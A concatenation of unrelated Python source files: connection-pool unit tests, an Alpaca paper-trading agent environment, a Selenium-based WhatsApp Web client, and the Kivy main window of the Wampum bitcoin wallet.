self.assertNotEqual(db1, db2)
self.assertNotEqual(db1_con, db2_con)
try:
self.assertRaises(Empty, queue.get, 1, 0.1)
except TypeError:
self.assertRaises(Empty, queue.get, 0)
del db1
try:
db1 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assertEqual(db1._con, db1_con)
def test_reset_transaction(self):
pool = PooledPg(1)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(con.session, ['begin', 'rollback'])
self.assertEqual(con.num_queries, 1)
pool = PooledPg(1, reset=1)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
self.assertEqual(con.session, ['rollback', 'begin'])
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(
con.session, ['rollback', 'begin', 'rollback', 'rollback'])
self.assertEqual(con.num_queries, 1)
pool = PooledPg(1, reset=2)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
self.assertEqual(con.session, ['begin'])
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(con.session, [])
self.assertEqual(con.num_queries, 0)
def test_context_manager(self):
pool = PooledPg(1, 1, 1)
with pool.connection() as db:
db_con = db._con._con
db.query('select test')
self.assertEqual(db_con.num_queries, 1)
self.assertRaises(TooManyConnections, pool.connection)
with pool.connection() as db:
db_con = db._con._con
db.query('select test')
self.assertEqual(db_con.num_queries, 2)
self.assertRaises(TooManyConnections, pool.connection)
if __name__ == '__main__':
unittest.main()
|
env_stock_papertrading_erl.py
|
import datetime
import threading
import time
import alpaca_trade_api as tradeapi
import gym
import numpy as np
import pandas as pd
import torch
from finrl_meta.data_processors.alpaca import Alpaca
class AlpacaPaperTrading_erl():
def __init__(self, ticker_list, time_interval, agent, cwd, net_dim,
state_dim, action_dim, API_KEY, API_SECRET,
API_BASE_URL, tech_indicator_list, turbulence_thresh=30,
max_stock=1e2, latency=None):
# load agent
if agent == 'ppo':
from elegantrl.agent import AgentPPO
from elegantrl.run import Arguments, init_agent
# load agent
config = {'state_dim': state_dim,
'action_dim': action_dim, }
args = Arguments(agent=AgentPPO, env=StockEnvEmpty(config))
args.cwd = cwd
args.net_dim = net_dim
# load agent
try:
agent = init_agent(args, gpu_id=0)
self.act = agent.act
self.device = agent.device
except BaseException:
raise ValueError("Fail to load agent!")
else:
raise ValueError('Agent input is NOT supported yet.')
# connect to Alpaca trading API
try:
self.alpaca = tradeapi.REST(API_KEY, API_SECRET, API_BASE_URL, 'v2')
except:
raise ValueError('Fail to connect Alpaca. Please check account info and internet connection.')
# read trading time interval
if time_interval == '1s':
self.time_interval = 1
elif time_interval == '5s':
self.time_interval = 5
elif time_interval == '1Min':
self.time_interval = 60
elif time_interval == '5Min':
self.time_interval = 60 * 5
elif time_interval == '15Min':
self.time_interval = 60 * 15
else:
raise ValueError('Time interval input is NOT supported yet.')
# read trading settings
self.tech_indicator_list = tech_indicator_list
self.turbulence_thresh = turbulence_thresh
self.max_stock = max_stock
# initialize account
self.stocks = np.asarray([0] * len(ticker_list)) # stocks holding
self.stocks_cd = np.zeros_like(self.stocks)
self.cash = None # cash record
self.stocks_df = pd.DataFrame(self.stocks, columns=['stocks'], index=ticker_list)
self.asset_list = []
self.price = np.asarray([0] * len(ticker_list))
self.stockUniverse = ticker_list
self.turbulence_bool = 0
self.equities = []
def test_latency(self, test_times=10):
total_time = 0
for i in range(0, test_times):
time0 = time.time()
self.get_state()
time1 = time.time()
temp_time = time1 - time0
total_time += temp_time
latency = total_time / test_times
print('latency for data processing: ', latency)
return latency
def run(self):
orders = self.alpaca.list_orders(status="open")
for order in orders:
self.alpaca.cancel_order(order.id)
# Wait for market to open.
print("Waiting for market to open...")
tAMO = threading.Thread(target=self.awaitMarketOpen)
tAMO.start()
tAMO.join()
print("Market opened.")
while True:
# Figure out when the market will close so we can prepare to sell beforehand.
clock = self.alpaca.get_clock()
closingTime = clock.next_close.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
self.timeToClose = closingTime - currTime
if (self.timeToClose < (60)):
# Close all positions when 1 minutes til market close.
print("Market closing soon. Stop trading.")
break
'''# Close all positions when 1 minutes til market close.
print("Market closing soon. Closing positions.")
positions = self.alpaca.list_positions()
for position in positions:
if(position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
# Run script again after market close for next trading day.
print("Sleeping until market close (15 minutes).")
time.sleep(60 * 15)'''
else:
trade = threading.Thread(target=self.trade)
trade.start()
trade.join()
last_equity = float(self.alpaca.get_account().last_equity)
cur_time = time.time()
self.equities.append([cur_time, last_equity])
time.sleep(self.time_interval)
def awaitMarketOpen(self):
isOpen = self.alpaca.get_clock().is_open
while (not isOpen):
clock = self.alpaca.get_clock()
openingTime = clock.next_open.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
timeToOpen = int((openingTime - currTime) / 60)
print(str(timeToOpen) + " minutes til market open.")
time.sleep(60)
isOpen = self.alpaca.get_clock().is_open
def trade(self):
state = self.get_state()
with torch.no_grad():
s_tensor = torch.as_tensor((state,), device=self.device)
a_tensor = self.act(s_tensor)
action = a_tensor.detach().cpu().numpy()[0]
action = (action * self.max_stock).astype(int)
self.stocks_cd += 1
if self.turbulence_bool == 0:
min_action = 10 # stock_cd
for index in np.where(action < -min_action)[0]: # sell_index:
sell_num_shares = min(self.stocks[index], -action[index])
qty = abs(int(sell_num_shares))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, self.stockUniverse[index], 'sell', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
self.stocks_cd[index] = 0
for index in np.where(action > min_action)[0]: # buy_index:
if self.cash < 0:
tmp_cash = 0
else:
tmp_cash = self.cash
buy_num_shares = min(tmp_cash // self.price[index], abs(int(action[index])))
qty = abs(int(buy_num_shares))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, self.stockUniverse[index], 'buy', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
self.stocks_cd[index] = 0
else: # sell all when turbulence
positions = self.alpaca.list_positions()
for position in positions:
if (position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.stocks_cd[:] = 0
def get_state(self):
alpaca = Alpaca(api=self.alpaca)
price, tech, turbulence = alpaca.fetch_latest_data(ticker_list=self.stockUniverse, time_interval='1Min',
tech_indicator_list=self.tech_indicator_list)
turbulence_bool = 1 if turbulence >= self.turbulence_thresh else 0
turbulence = (self.sigmoid_sign(turbulence, self.turbulence_thresh) * 2 ** -5).astype(np.float32)
tech = tech * 2 ** -7
positions = self.alpaca.list_positions()
stocks = [0] * len(self.stockUniverse)
for position in positions:
ind = self.stockUniverse.index(position.symbol)
stocks[ind] = (abs(int(float(position.qty))))
stocks = np.asarray(stocks, dtype=float)
cash = float(self.alpaca.get_account().cash)
self.cash = cash
self.stocks = stocks
self.turbulence_bool = turbulence_bool
self.price = price
amount = np.array(max(self.cash, 1e4) * (2 ** -12), dtype=np.float32)
scale = np.array(2 ** -6, dtype=np.float32)
state = np.hstack((amount,
turbulence,
self.turbulence_bool,
price * scale,
self.stocks * scale,
self.stocks_cd,
tech,
)).astype(np.float32)
print(len(self.stockUniverse))
return state
def submitOrder(self, qty, stock, side, resp):
if (qty > 0):
try:
self.alpaca.submit_order(stock, qty, side, "market", "day")
print("Market order of | " + str(qty) + " " + stock + " " + side + " | completed.")
resp.append(True)
except:
print("Order of | " + str(qty) + " " + stock + " " + side + " | did not go through.")
resp.append(False)
else:
print("Quantity is 0, order of | " + str(qty) + " " + stock + " " + side + " | not completed.")
resp.append(True)
@staticmethod
def sigmoid_sign(ary, thresh):
def sigmoid(x):
return 1 / (1 + np.exp(-x * np.e)) - 0.5
return sigmoid(ary / thresh) * thresh
class StockEnvEmpty(gym.Env):
# Empty Env used for loading rllib agent
def __init__(self, config):
state_dim = config['state_dim']
action_dim = config['action_dim']
self.env_num = 1
self.max_step = 10000
self.env_name = 'StockEnvEmpty'
self.state_dim = state_dim
self.action_dim = action_dim
self.if_discrete = False
self.target_return = 9999
self.observation_space = gym.spaces.Box(low=-3000, high=3000, shape=(state_dim,), dtype=np.float32)
self.action_space = gym.spaces.Box(low=-1, high=1, shape=(action_dim,), dtype=np.float32)
def reset(self):
return
def step(self, actions):
return
|
whatsapp_web.py
|
import os
import io
import re
import base64
import tkinter
import urllib.parse
from PIL import ImageTk, Image
from threading import Thread, Event
from selenium import webdriver
from selenium.webdriver import ChromeOptions
from selenium.common.exceptions import NoSuchElementException
USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84'
WHATSAPP_API_SCRIPT = os.path.join(os.path.dirname(__file__), '..', 'scripts', 'whatsapp_api.js')
class WhatsAppWeb:
def __init__(self, executable_path, headless=True):
options = ChromeOptions()
options.headless = headless
options.add_argument('--incognito')
options.add_argument('--lang=en_US')
options.add_argument('--window-size=1366x768')
options.add_argument('disable-blink-features=AutomationControlled')
options.add_argument(f'user-agent={USER_AGENT}')
options.add_argument("--log-level=OFF")
options.add_experimental_option('excludeSwitches', ['enable-logging'])
self._driver = webdriver.Chrome(executable_path=executable_path, options=options)
self._driver.implicitly_wait(15)
self._driver.get('https://web.whatsapp.com')
self._login()
self._load_whatsapp_api()
def get_contact_profile_image_url(self, jid):
return self._driver.execute_async_script("""
let resolve = arguments[1];
window.whatsapp_api.getContactProfileImage(arguments[0]).then((url) => resolve(url));
""", jid)
def get_user_profile_image_url(self):
url = self._driver.find_element_by_xpath('//div[@id="side"]//img').get_attribute('src')
url = 'https' + url.lstrip('https://web.whatsapp.com/pp?e=')
return urllib.parse.unquote(url)
def _login(self):
def _check_login(quit_event):
try:
self._driver.find_element_by_xpath("//div[@title='New chat']")
except NoSuchElementException:
raise RuntimeError('login state was not identified')
finally:
quit_event.set()
qr_code = self._get_qr_image()
quit_event = Event()
Thread(target=_check_login, args=(quit_event,), daemon=True).start()
self._show_image(qr_code, 'WhatsApp Web QR Code', quit_event)
def _show_image(self, image, title, quit_event):
def _wait_quit_event(tk, event):
event.wait()
tk.destroy()
root = tkinter.Tk()
root.title(title)
render = ImageTk.PhotoImage(image)
img = tkinter.Label(image=render)
img.pack(side=tkinter.TOP)
Thread(target=_wait_quit_event, args=(root, quit_event), daemon=True).start()
root.mainloop()
def _get_qr_image(self):
canvas_element = self._driver.find_element_by_xpath('//canvas[@aria-label="Scan me!"]')
image_url = self._driver.execute_script('return arguments[0].toDataURL()', canvas_element)
base64_data = re.sub('^data:image/.+;base64,', '', image_url)
return Image.open(io.BytesIO(base64.b64decode(base64_data)))
def _load_whatsapp_api(self):
with open(WHATSAPP_API_SCRIPT) as file:
self._driver.execute_script(file.read())
self._driver.execute_script('window.whatsapp_api = new window.WhatsAppAPI();')
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import wampum
from wampum.bitcoin import TYPE_ADDRESS
from wampum import WalletStorage, Wallet
from wampum_gui.kivy.i18n import _
from wampum.paymentrequest import InvoiceStore
from wampum.util import profiler, InvalidPassword
from wampum.plugins import run_hook
from wampum.util import format_satoshis, format_satoshis_plain
from wampum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='wampum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='wampum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='wampum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='wampum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('wampum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='wampum_gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from wampum.util import base_units
class WampumWindow(App):
wampum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from wampum.bitcoin import NetworkConstants
pp = servers.get(host, NetworkConstants.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.wampum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.wampum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.wampum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.wampum_config.get('base_unit', 'mBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.wampum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Wampum App')
self.wampum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', False)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from wampum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from wampum.transaction import Transaction
from wampum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from wampum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from wampum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.wampum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.wampum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.wampum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Wampum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.wampum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of wampum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='wampum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='wampum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('wampum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('wampum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/wampum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.wampum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.wampum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Wampum', message,
app_icon=icon, app_name='Wampum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
